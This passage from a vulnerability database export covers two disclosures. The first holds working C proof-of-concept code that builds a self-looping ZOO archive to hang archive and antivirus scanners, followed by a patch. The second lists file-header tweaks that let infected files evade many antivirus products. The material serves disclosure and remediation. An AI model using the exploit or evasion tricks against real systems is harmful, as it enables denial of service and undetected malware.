D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n         put_byte (ptr + 2, data >> 16);\n         put_byte (ptr + 3, data >> 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s <archive name>\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         }\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it's not possible to process the same files over\nand over again.  Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? */\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr <= zoo_pointer)\n+          prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (&zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list && !fast)\n              show_comment (&direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already processed data */\n+      if (direntry.next <= zoo_pointer)\n+               prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
      ],
      trust: 2.07,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2007-1673",
            trust: 2.9,
         },
         {
            db: "BID",
            id: "23823",
            trust: 2,
         },
         {
            db: "SECUNIA",
            id: "25315",
            trust: 1.7,
         },
         {
            db: "OSVDB",
            id: "36208",
            trust: 1.7,
         },
         {
            db: "SREASON",
            id: "2680",
            trust: 1.7,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
            trust: 0.8,
         },
         {
            db: "XF",
            id: "34080",
            trust: 0.6,
         },
         {
            db: "BUGTRAQ",
            id: "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-25035",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "56479",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   id: "VAR-200705-0187",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:12:33.864000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://amavis.org/",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-399",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/bid/23823",
         },
         {
            trust: 1.7,
            url: "http://www.amavis.org/security/asa-2007-2.txt",
         },
         {
            trust: 1.7,
            url: "http://osvdb.org/36208",
         },
         {
            trust: 1.7,
            url: "http://secunia.com/advisories/25315",
         },
         {
            trust: 1.7,
            url: "http://securityreason.com/securityalert/2680",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1673",
         },
         {
            trust: 0.6,
            url: "http://www.barracudanetworks.com/ns/products/spam_overview.php",
         },
         {
            trust: 0.6,
            url: "http://xforce.iss.net/xforce/xfdb/34080",
         },
         {
            trust: 0.6,
            url: "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.pandasoftware.com/",
         },
         {
            trust: 0.3,
            url: "http://www.picozip.com/",
         },
         {
            trust: 0.3,
            url: "http://www.winace.com/",
         },
         {
            trust: 0.3,
            url: "/archive/1/467646",
         },
         {
            trust: 0.3,
            url: "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c",
         },
         {
            trust: 0.1,
            url: "http://www.guay-leroux.com",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2007-05-09T00:00:00",
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            date: "2007-05-04T00:00:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            date: "2007-05-04T16:51:04",
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            date: "2007-05-09T01:19:00",
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            date: "2007-05-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-10-16T00:00:00",
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            date: "2016-07-06T14:39:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            date: "2018-10-16T16:40:28.443000",
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            date: "2007-05-10T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "AMaViS Of multiple products used in  unzoo.c Service disruption in  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "resource management error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
      trust: 0.6,
   },
}

var-201203-0367
Vulnerability from variot

The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. Multiple products RAR A file parser contains a vulnerability that can prevent malware detection. Different RAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By the attacker, MZ Has a character sequence starting with RAR Malware detection may be avoided via files. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Sophos Anti-Virus is a set of anti-virus software for various operating systems from Sophos, UK. The software detects and removes viruses, spyware, trojans and worms in real time, ensuring comprehensive network protection for desktops and laptops. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.

Vulnerability Descriptions

  1. Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.

Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00

CVE no - CVE-2012-1419

  1. Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03

CVE no - CVE-2012-1420

  1. Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103

CVE no - CVE-2012-1421

  1. Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1422

  1. Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.

Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0

CVE no - CVE-2012-1423

  1. Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0

CVE no - CVE-2012-1424

  1. Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection.

Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004

CVE no - CVE-2012-1425

  1. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1426

  1. Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1427

  1. Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1428

  1. Specially crafted infected ELF files with "ustar" at offset 257 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01

CVE no - CVE-2012-1429 12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1430 13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1431

  1. Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1432

  1. Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1433

  1. Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1434

  1. Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1435

  1. Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1436

  1. Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.

Affected products - Comodo 7425

CVE no - CVE-2012-1437

  1. Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.

Affected products - Comodo 7425, Sophos 4.61.0

CVE no - CVE-2012-1438

  1. 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1439

  1. 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.

Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1440

  1. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
    If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - Prevx 3.0

'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc', 'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and 'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0

CVE no - CVE-2012-1441

  1. 'class' field in ELF files is parsed incorrectly.
    If an infected ELF file's class field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1442

  1. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.

Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2

CVE no - CVE-2012-1443

  1. 'abiversion' field in ELF files is parsed incorrectly.
    If an infected ELF file's abiversion field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1444

  1. 'abi' field in ELF files is parsed incorrectly.
    If an infected ELF file's abi field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1445

  1. 'encoding' field in ELF files is parsed incorrectly.
    If an infected ELF file's encoding field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, Symantec 20101.3.0.103, Norman 6.06.12, eSafe 7.0.017.0, Kaspersky 7.0.0.125, McAfee-GW-Edition 2010.1C, Sophos 4.61.0, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, PCTools 7.0.3.5, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1446

  1. 'e_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's e_version field is incremented by 1 it evades detection.

Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7

CVE no - CVE-2012-1447

  1. 'cbCabinet' field in CAB files is parsed incorrectly.
    If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1

CVE no - CVE-2012-1448

  1. 'vMajor' field in CAB files is parsed incorrectly.
    If an infected CAB file's vMajor field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1449

  1. 'reserved3' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1450

  1. 'reserved2' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved2 field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1451

  1. 'reserved1' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00

CVE no - CVE-2012-1452

  1. 'coffFiles' field in CAB files is parsed incorrectly.
